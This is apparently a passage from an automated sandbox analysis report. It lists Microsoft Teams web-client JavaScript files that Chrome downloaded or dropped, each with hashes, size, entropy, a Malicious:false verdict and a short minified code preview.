                                                                                                                                                                                                                                                                            SHA-512:E13F6E954CF561E68E4F3D89D1AD662CBD1D406AFA4D216A118109FD5403BB98D1C7D712E10FD8D366A122719F62F7DDCA722C71120EB3A1018C60F87713CFAC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816373],{752705:function(t,n,e){!function(r,i){{const r=(o=o||function(t,n){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==e.g&&e.g.crypto&&(r=e.g.crypto),!r)try{r=e(475443)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(n){var e;return t.prototype=n,e=new t,t.prototype=null,e}}(),s={},a=s.lib={},c=a.Base={extend:function(t){var n=o(this);retu
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):659293
                                                                                                                                                                                                                                                                            Entropy (8bit):5.659066837306497
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:y7pDzYduNRNAuqoFsdzgylHgrqtX4UjHEcY3ce/rs1186dodt0w:y7pny+shgBww
                                                                                                                                                                                                                                                                            MD5:6600B27DC42661FC872FD25612364556
                                                                                                                                                                                                                                                                            SHA1:01ECE59C2F3E03DC44FA096F4BAA70B70FB4477D
                                                                                                                                                                                                                                                                            SHA-256:A331F0D959EF3A29406FFDCA21C0B82A6C27C097A694C5D7D05915AEFD0F53B9
                                                                                                                                                                                                                                                                            SHA-512:3754CFDB2183798153883D482CC4CE1411C5A811CC13750B401DA792D569C7FC06669E389B36E5617D6D99990291D0DBC0E50256FC143F3BC8999DA3E9E5F547
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[443621,847386],{73654:(e,t,i)=>{"use strict";i.d(t,{o:()=>r});var n=i(513432);const{useEffect:a,useRef:o,useState:s}=n;function r(e){const t=o(!1),i=o(new Image),[n,r]=s(!1);return e&&i.current.src!==e&&(i.current.src=e),i.current.onerror=()=>{t.current&&r(!0)},a((()=>(t.current||(t.current=!0),()=>{t.current=!1})),[]),n}},753515:(e,t,i)=>{"use strict";var n,a,o,s,r;i.d(t,{t:()=>s}),function(e){e.EnterKey="EnterKey",e.SearchButton="SearchButton"}(n||(n={})),function(e){e.Relevance="Relevance",e.DateTime="DateTime"}(a||(a={})),function(e){e.Messages="Messages",e.People="People",e.Communities="Communities",e.Files="Files",e.All="All",e.Emails="Emails",e.Meetings="Meetings",e.GroupChats="GroupChats",e.TeamsAndChannels="TeamsAndChannels",e.Default="Default"}(o||(o={})),function(e){e.chat="chat",e.channel="channel"}(s||(s={})),function(e){e[e.THUMBS_DOWN=1]="THUMBS_DOWN",e[e.THUMBS_UP=2]="THUM
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22028)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                                                            Entropy (8bit):5.408588929590394
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:B3NqcNsJobwv8blMDkuYMBYcTjlXH8P2WOhCOdf1D71yF7Ju0bTul3cE+w4Ry7Eq:VE4VUv8RMD9YMBYcnlXH8P2WOhCOdf1P
                                                                                                                                                                                                                                                                            MD5:A87E1F75E1BF072B58ED22C7F8DB87A7
                                                                                                                                                                                                                                                                            SHA1:C4FDB0BA7198411E7510008AD2E812F3BB68D462
                                                                                                                                                                                                                                                                            SHA-256:1DC0883980E666CFDB588463571ECC238B750ADD14372B967A18E2C427DAB9F1
                                                                                                                                                                                                                                                                            SHA-512:64CD0292C77ADBDF95568D680F0DCC9B429A30553F6678ACD487D09C63C8E609FE3A043FFDFADD77BD41382D474B3186A57B2009919F7F6A3F1702805A2F4622
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/816410-26421d0c40cd02ca.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816410],{816410:function(e){e.exports=function(){"use strict";const{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object;let{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});const u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),_=b(String.prototype.indexOf),T=b(String.prototype.trim),y=b(Object.prototype.hasOwnProperty),E=b(RegExp.prototype.test),A=S(TypeError);function N(e){return"number"==typeof e&&isNaN(e)}function b(e){return function(t){for(var n=arguments.length,o=new Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=argument
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27739)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):27847
                                                                                                                                                                                                                                                                            Entropy (8bit):5.582655801046033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:PVpVp1EWy8YJ74IXobfOBTdwTcbmtd2MysmVCmTd3U:PVpVXyV47OBTj2Lyrdk
                                                                                                                                                                                                                                                                            MD5:B86940E1249BB0C8AFE8DB03135E4D43
                                                                                                                                                                                                                                                                            SHA1:14F8EBD539B8BD151DA240F7890FDC36E0E2AB11
                                                                                                                                                                                                                                                                            SHA-256:04EFF2C0FF17604532B25CA5088568505B7F5FF5ED0B5B0CED70ECE7B3B146BE
                                                                                                                                                                                                                                                                            SHA-512:C1B3C15803C20A2DDCF973707FD25A738B368C09481EB729F50EAB72BB598FF558EF8047607D8923F2F9263CEE1BE0A08EEFC7312E4F2A697D890E03E9CFA06C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[170464],{805809:(e,t,n)=>{"use strict";var i,a;n.d(t,{p:()=>i,f:()=>a}),function(e){e.ActiveDirectoryGroupService="ActiveDirectoryGroupService",e.AiInsightsFeedbackService="AiInsightsFeedbackService",e.AppService="appservice",e.AppStudio="appstudio",e.AMS="asyncMediaService",e.AtpSafelinksService="atpSafelinksService",e.Attendee="attendee",e.AllFiles="allFiles",e.Auth="auth",e.Badger="badger",e.BRB="brb",e.CDN="cdn",e.CallingConversationService="callingConversationService",e.ChannelNotificationSettings="channelNotificationSettings",e.CognitiveService="cognitiveService",e.ChatService="chatservice",e.CMDArtifactsService="cmdArtifactsService",e.CmdMeetingIntelligenceService="cmdMeetingIntelligenceService",e.CMDServices="cmdServices",e.CNS="cns",e.CollabCloudService="collabCloudService",e.CSA="csa",e.CustomEmoji="customEmoji",e.CXCS="cxcs",e.DynamicsMarketing="dynamicsMarketing",e.DynamicsVir
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15885)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15993
                                                                                                                                                                                                                                                                            Entropy (8bit):4.29920573326791
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:53Xt9Whl53CLeG9WIA9y64grsACP0Ne0Cd2M5Obdk3ILZV3umGVW1Q2xgkG/A8Pi:1Wongwdz4bdbZGyg9/A8PdVQp
                                                                                                                                                                                                                                                                            MD5:493B5F0960B7170BEB6C125CD858C739
                                                                                                                                                                                                                                                                            SHA1:6E7779C6F84A34FF98935C044BFF8F80F6EC5C3F
                                                                                                                                                                                                                                                                            SHA-256:F73BB0C05FF62010865EA0472C40B24A5B05F0C3880648AA30AE13B9E30C944E
                                                                                                                                                                                                                                                                            SHA-512:BE2A4BD0864CD4AB8DE13DDF7EFBA22577EAA0C48F9A116E8D5019A48B2EA686BB07E569E96118D502D19398BE513CED91029D4CE4965D9711C7ABD0EDDB1A71
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[620314],{620314:(a,l,c)=>{c.d(l,{Pf_:()=>Z,BHo:()=>e,VmI:()=>v,z0D:()=>m,Wro:()=>M,MKZ:()=>L,gBG:()=>i,g1i:()=>r,KPm:()=>t,Ugv:()=>A,oCp:()=>u,GLf:()=>V,p4c:()=>H,FF8:()=>U,UL4:()=>s,Oy3:()=>g,vqM:()=>T,r3T:()=>d,K53:()=>b,Cbs:()=>o,naJ:()=>R,Qj7:()=>n,KNH:()=>k,iV5:()=>C,GV$:()=>F,fbj:()=>x});var h=c(693935);const Z=(0,h.U)("TextNumberListLtr20Filled","20",["M5 1.5a.5.5 0 0 0-.39-.49.5.5 0 0 0-.56.27l-.07.12a2.96 2.96 0 0 1-1.2 1.15.5.5 0 1 0 .44.9c.3-.15.56-.34.78-.53V5.5a.5.5 0 0 0 1 0v-4ZM8.75 4a.75.75 0 1 0 0 1.5h7.5a.75.75 0 0 0 0-1.5h-7.5Zm0 5a.75.75 0 1 0 0 1.5h7.5a.75.75 0 0 0 0-1.5h-7.5ZM8 14.75c0-.41.34-.75.75-.75h7.5a.75.75 0 0 1 0 1.5h-7.5a.75.75 0 0 1-.75-.75Zm-5.35-7.1a.5.5 0 0 0 .7.7l.05-.04.2-.12C3.76 8.09 4 8 4.3 8c.23 0 .41.06.53.15.1.07.16.17.16.35a.5.5 0 0 1-.21.44c-.15.12-.35.22-.62.35l-.14.08c-.32.15-.7.36-1 .7-.33.35-.53.81-.53 1.43 0 .28.22.5.5.5h2.5a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14683)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):14791
                                                                                                                                                                                                                                                                            Entropy (8bit):5.266981559868186
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:2q6vWeIhioM4yCAYegeKm8hMSscOqNEyUrz4zFq78svf:9rhkCzHzm8+SscOIcrz4z478sX
                                                                                                                                                                                                                                                                            MD5:2E0776EBD7D4B5D9BD0F3EA70A26ED97
                                                                                                                                                                                                                                                                            SHA1:B42030D90141DA576EBAC49F964DF2EE906CC45E
                                                                                                                                                                                                                                                                            SHA-256:86DC234E21FBDD307DC021937F9DFCB43C092DE11E6D9C8122C29CA7F2B86E0B
                                                                                                                                                                                                                                                                            SHA-512:1652374979088D5C4CA91D9FDD8893A5FD0EE02CF89A63A2383C6717FC9A2D8FF701F7A71FC4928D6E35BFB05AC9F7FD30618238CC26476993C64EE482A3D0A9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[517259],{706201:(e,t,s)=>{s.d(t,{d:()=>i,I:()=>n});class i{constructor(e){this.valueGenerator=e,this._evaluated=!1}get evaluated(){return this._evaluated}get value(){return this._evaluated||(this._evaluated=!0,this._value=this.valueGenerator()),this._value}}class n{get[Symbol.toStringTag](){return"[object LazyPromise]"}constructor(e){this.execute=e}async then(e,t){return this.getPromise().then(...arguments)}async catch(e){return this.getPromise().catch(...arguments)}async finally(e){return this.getPromise().finally(...arguments)}async getPromise(){return void 0===this.result&&(this.result=this.execute()),this.result}}},211834:(e,t,s)=>{s.d(t,{x:()=>i});const i="IFluidDependencySynthesizer"},203716:(e,t,s)=>{s.d(t,{h:()=>r});var i=s(706201),n=s(211834);class r{get IFluidDependencySynthesizer(){return this}constructor(...e){this.providers=new Map,this.parents=e.filter((e=>void
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7088)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):7196
                                                                                                                                                                                                                                                                            Entropy (8bit):5.537796068488159
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:mXLuuTV/Kl2Vr4qcyQnCjzuKJuiuhQ0u75XhsXSN4LrFfyiRgyCmgr/epumHJ2V2:PuMVfzCOVnk75XPN4tjVAWxVkFkGeMa
                                                                                                                                                                                                                                                                            MD5:615EE68C746BD29AAE63F5CD3B9B7805
                                                                                                                                                                                                                                                                            SHA1:EF9AE532F5F070415990D6D24F15EE11B1179093
                                                                                                                                                                                                                                                                            SHA-256:DAFAC5A5CCFF385614FFFD5E0457F5857C5163151D8EB44CC23D205AB1A43417
                                                                                                                                                                                                                                                                            SHA-512:BB1AE12239514377A4EBDE3B2A6C67AE808A4F47E999D0538B6AFE6300E4EB32816B49EB081CCCEDC7C8BC507D7B0F125AEBAE234B5E7401C06D5918A0734F07
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[164175],{469754:e=>{var t,n=function(){function e(e,t){if("function"!=typeof e)throw new TypeError("DataLoader must be constructed with a function which accepts Array<key> and returns Promise<Array<value>>, but got: "+e+".");this._batchLoadFn=e,this._maxBatchSize=function(e){var t=!e||!1!==e.batch;if(!t)return 1;var n=e&&e.maxBatchSize;if(void 0===n)return 1/0;if("number"!=typeof n||n<1)throw new TypeError("maxBatchSize must be a positive number: "+n);return n}(t),this._batchScheduleFn=function(e){var t=e&&e.batchScheduleFn;if(void 0===t)return r;if("function"!=typeof t)throw new TypeError("batchScheduleFn must be a function: "+t);return t}(t),this._cacheKeyFn=function(e){var t=e&&e.cacheKeyFn;if(void 0===t)return function(e){return e};if("function"!=typeof t)throw new TypeError("cacheKeyFn must be a function: "+t);return t}(t),this._cacheMap=function(e){var t=!e||!1!==e.cach
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12648), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):12648
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331618680016599
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:UBvT91sirzk6r/Ta1sirzogFXhFh76cQJ:UBvT3To6jqTkgFXhFh76cQJ
                                                                                                                                                                                                                                                                            MD5:B3688EB03DF81642144495322F067B41
                                                                                                                                                                                                                                                                            SHA1:B1A0AB57D487B8D2F6C6883204DDAD50D74121A9
                                                                                                                                                                                                                                                                            SHA-256:6FE9A5B6A3BB2C20937E96B04EDE350E39C6AEC365BE5DEA991C8AEFE235B9C8
                                                                                                                                                                                                                                                                            SHA-512:C0D86423670A2D99785609EE5A93C59A7384C16751840BC7D7E0A84A9F1CAB4116AB889CA7842456D308443A5650CC855B845C347D472FA07AE250BBAD6C9743
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/batched-remoteEntry-fc09dbd144865a71c3e5.js
                                                                                                                                                                                                                                                                            Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(215111),r.e(750818),r.e(978582),r.e(756854),r.e(769268),r.e(70674),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=5649
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):152852
                                                                                                                                                                                                                                                                            Entropy (8bit):4.408111707727397
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:TUIUSL0uGXPMXoFExy8aL127F3KlxBE/Xh6:aFOy8aL1aKp
                                                                                                                                                                                                                                                                            MD5:20AC22EBF3982B42211519B0C3829439
                                                                                                                                                                                                                                                                            SHA1:DE630EF84A805FB28BFC88CA73092093E9F9D4BF
                                                                                                                                                                                                                                                                            SHA-256:CF46004FD575CA28AC17F6F4D1B02AC5BF48DA55D9F261C4564A51E4C2C21FAF
                                                                                                                                                                                                                                                                            SHA-512:B9587652B99ED4F1B873E33421A948EB598077566A6EE673E469049A8E791F0EEE379C15775AE29F327B3EE12B63C1381E5CC18A5D979851BC1636B9B4279F07
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[355005],{169233:(a,l,Z)=>{Z.d(l,{ZtX:()=>c,vXm:()=>e,on3:()=>m,m61:()=>v,Yfv:()=>M,wbC:()=>A,l1P:()=>H,dcr:()=>V,$Vp:()=>r,tX_:()=>i,K4k:()=>U,gNM:()=>d,C$A:()=>L,QUO:()=>t,FV:()=>u,Jkc:()=>R,qw7:()=>o,eAs:()=>C,Co4:()=>g,ETz:()=>n,xyh:()=>F,BjN:()=>s,f9S:()=>p,Rl_:()=>w,tXH:()=>T,JAW:()=>f,dIR:()=>S,XST:()=>b,lOY:()=>k,Tu1:()=>B,mho:()=>x,g0A:()=>I,PCP:()=>D,hyw:()=>y,qTc:()=>E,cUx:()=>q,ryW:()=>O,lkJ:()=>P,cDX:()=>z,M5p:()=>_,__C:()=>W,muQ:()=>Q,SEp:()=>X,Yx5:()=>$,IEM:()=>G,SZX:()=>N,abA:()=>Y,mdF:()=>J,_tw:()=>K,a1m:()=>j,LI8:()=>aa,Tp5:()=>la,fXC:()=>Za,ZRs:()=>ha,nQe:()=>ca,l_X:()=>ea,SGl:()=>ma,MZl:()=>va,up$:()=>Ma,IM1:()=>Aa,iju:()=>Ha,uEE:()=>Va,a2s:()=>ra,Yi9:()=>ia,iBC:()=>Ua,GN6:()=>da,UEN:()=>La,Tdu:()=>ta,Rvv:()=>ua,Sub:()=>Ra,qqS:()=>oa,ZJF:()=>Ca,nn9:()=>ga,W9G:()=>na,Um6:()=>Fa,oYc:()=>sa,O35:()=>pa,PDr:()=>wa,P0w:()=>Ta,r$t:()=>fa,JdG:()=>Sa,xKI:()=>ba,rCW:
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6319)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):6427
                                                                                                                                                                                                                                                                            Entropy (8bit):4.4308482631155695
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:mzzHyNX1EuXaOX4XLlCOqZ09wz4mgIbwrLgIbVqZL2LKaXp1FmpvZKC64t0BMwnJ:smmY/i5mgJghL2dpLmpxu4+GwrX1X
                                                                                                                                                                                                                                                                            MD5:6AB4C01752844AD21C4E0BAC95CF24BB
                                                                                                                                                                                                                                                                            SHA1:0AE7E23782C4513D303DA88FEA3005A7A8D1A303
                                                                                                                                                                                                                                                                            SHA-256:0AA43576327DB0F8B6575E6BB0BCB139B3865E1D734BA61D17A73853C836B687
                                                                                                                                                                                                                                                                            SHA-512:FC30BE1341B69DFEF9AD6588F53F5EBAFFB7F5984654F8CEA153B12FCA6CE4365762F6843CF660EC1305BEBF966FA5B68E09F7BBDE9868597BF0022E50BEC3A3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[724003],{724003:(a,l,c)=>{c.d(l,{u5x:()=>h,Bv$:()=>Z,TRI:()=>v,fXE:()=>r,wMk:()=>M,WtI:()=>m,Ukm:()=>t,GTQ:()=>A,c_W:()=>S,cOo:()=>u,UE_:()=>U,ecH:()=>R,RUt:()=>V});var e=c(693935);const h=(0,e.U)("Search16Regular","16",["M9.3 10.02a4.5 4.5 0 1 1 .7-.7l3.85 3.83a.5.5 0 0 1-.7.7L9.3 10.02ZM10 6.5a3.5 3.5 0 1 0-7 0 3.5 3.5 0 0 0 7 0Z"]),Z=(0,e.U)("Search20Filled","20",["M8.5 3a5.5 5.5 0 0 1 4.38 8.82l4.15 4.15a.75.75 0 0 1-.98 1.13l-.08-.07-4.15-4.15A5.5 5.5 0 1 1 8.5 3Zm0 1.5a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),v=(0,e.U)("Search20Regular","20",["M8.5 3a5.5 5.5 0 0 1 4.23 9.02l4.12 4.13a.5.5 0 0 1-.63.76l-.07-.06-4.13-4.12A5.5 5.5 0 1 1 8.5 3Zm0 1a4.5 4.5 0 1 0 0 9 4.5 4.5 0 0 0 0-9Z"]),r=(0,e.U)("Search24Regular","24",["M4.5 10a5.5 5.5 0 1 1 11 0 5.5 5.5 0 0 1-11 0ZM10 3a7 7 0 1 0 4.4 12.45l5.32 5.33a.75.75 0 1 0 1.06-1.06l-5.33-5.33A7 7 0 0 0 10 3Z"]),M=(0,e.U)("Settings20Regular
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):130577
                                                                                                                                                                                                                                                                            Entropy (8bit):6.118042173827681
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ttzQGu25DbX+jkCmv9HDU97un6mU3s5HQRdbDXroSB1bdw4yiVzVOfuGlVUWjG6N:cmU3RdbfoSBfFh7GlVUIJroo
                                                                                                                                                                                                                                                                            MD5:DB575D5168A86495A7FC90FC31B11FB6
                                                                                                                                                                                                                                                                            SHA1:DDCC208E5A9E90135C617E453D03282DF2AC57DF
                                                                                                                                                                                                                                                                            SHA-256:BC604E505DE25195860B4D6F8EE92DF4F8B63C159C7689D36D77F17CAE2B3F2C
                                                                                                                                                                                                                                                                            SHA-512:904F66546CE44BB74487930BC281B5518FCB7CD889009CD00A110EDB3A5B6D70FE07A5EBF6A44D38E0C7C0DB72357431E66E9F9A6A05D1B392F4883A9753DC53
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[18785],{869700:(e,t,a)=>{"use strict";a.d(t,{W:()=>u});var i=a(513432),n=a(510139),l=a(348532),o=a(802756),M=a(362328);const c={kind:"Document",get definitions(){const e=(0,M.G)("mutation removeAuthenticatedUser($reason:String!,$userContextId:String) {removeAuthenticatedUser(reason:$reason,userContextId:$userContextId)}");return delete this.definitions,this.definitions=e.definitions}};var r=a(211713);function u(e){const t=function({authenticationService:e,client:t,rebootService:a}){return(0,i.useCallback)((async i=>{if(!t&&!e)return;const M={id:(0,n.DA)(),source:"use-logout",scenarioName:o.Cu.AuthWebLogout},[u,s]=(0,r.we)({options:{correlation:M},scenarioName:M.scenarioName,source:M.source,subContext:"use-logout::useHandleLogout"});if(u.appendScenarioEventData({operationType:"auth error page"}),t)await t.mutate({mutation:c,variables:{reason:"auth error page",userContextId:i},context:{corr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):359671
                                                                                                                                                                                                                                                                            Entropy (8bit):5.9273502933188835
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:ma3lgT9L/vlE7eI2/bUKu1B5FrXUeg2fJyXytyTP37Th4Lyr:ma6L+7eI2/bUKu1rXQiJ6Cyj3faW
                                                                                                                                                                                                                                                                            MD5:7DBB1A2AF26D6799A367A5AB65A78D44
                                                                                                                                                                                                                                                                            SHA1:0DE0F024CE4D1A832E9571188EFC147BCF7938C6
                                                                                                                                                                                                                                                                            SHA-256:74590FD217950F46762E7BE03C68A09446A995F4A7DC4ED91E27FBE10E2F9757
                                                                                                                                                                                                                                                                            SHA-512:822BA52C3B718219A34B957D2A3C8342448F2B255E881FC13878ED4F4A4F99C1509F6041C43102BD19F24E8BE7751487AD98F8918569E9DECAA1061A5CB46FD2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/integrities-74590fd217950f46762e.js
                                                                                                                                                                                                                                                                            Preview:window.__teamsSriHashes = window.__teamsSriHashes || {};.Object.assign(window.__teamsSriHashes, {"253":"sha256-dCHiqHHbT8C54v6xkfBWJOlN4qDwMFHJpfWkbDSMY1I=","304":"sha256-1EHp3/t0hGPo3dZ0KSxFjRb9sJUAbs5LuulZRWj8fuc=","450":"sha256-ouv3RNGdmdsmy9N5iMOstCZXhW6f6KuOHbHWbPY8IkI=","555":"sha256-1XCNZ4M/VA/Cs3u4YVBW4RmTc7HQPJ1SgO9LNZDEvIE=","563":"sha256-OIwfU2nVSk61izw6PPlbs6uhn6vrbsahqPVRgpEY+yg=","757":"sha256-eE44F4pLVlEYadEsrIZ4vjkJu3/kIBCnXE70c464NfM=","785":"sha256-/9eS87EqHAeR7rqdzN0Sgnc69tvTQK23LlWT0IVjd0s=","818":"sha256-HRQfl5qrrNxSihawrKVl6appBIRSNE+LwsvSW1bgLNc=","906":"sha256-L5gEiGP2s/6usJyzymx28/OI554GDHRFFoa1Zgz27xg=","1079":"sha256-AJb1brTr1NgAtonwrQ7awmQGy7xZxCmmPEjtbTEtBXQ=","1081":"sha256-QV0RxKqJLIsxCyK/DlYEuPGD459atbpezw5s7F7ir0I=","1170":"sha256-JDhpHtZ6E4OzpC7AkARyf+KbMplq8nJfnZ64M4UwnSQ=","1214":"sha256-FIGgND7SkFJQs87te48T7KbVZ0x5hWUOQPRyJAWo5FU=","1258":"sha256-vZ+JBKqlmK8u03V/tfF86M7gAbjeFWbaZTfqTGaAquE=","1498":"sha256-6ulAN9dXJ1GtYDLYn80gVBfSZ5O6TSlZARpA2vs+8Qk
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (61177)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):113378
                                                                                                                                                                                                                                                                            Entropy (8bit):5.285066693137765
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:QpHDgBvguhw+EViazA/PWrF7qvEAFiQcpmQhSeC1Jzc6VUW3:xkXhp6VU0
                                                                                                                                                                                                                                                                            MD5:9C837C2B6C9C441656C3C64BE6FC6401
                                                                                                                                                                                                                                                                            SHA1:D44AA83093C4109DDD8FFAEA60755F05D1BFE7D3
                                                                                                                                                                                                                                                                            SHA-256:68C2994E21A564345EB3B4091DD2334C9CBDDB0AECDA45EE963C6DE2E1629B93
                                                                                                                                                                                                                                                                            SHA-512:AF04835BCC621FE1793C4661FDB03EDEA16219BAA77F1198AA419F771B6B3DCDAC3DA92676568C207022251483AB79C75AB6DF2CE94924748FF9CEBF64AFF5A2
                                                                                                                                                                                                                                                                            Malicious:false
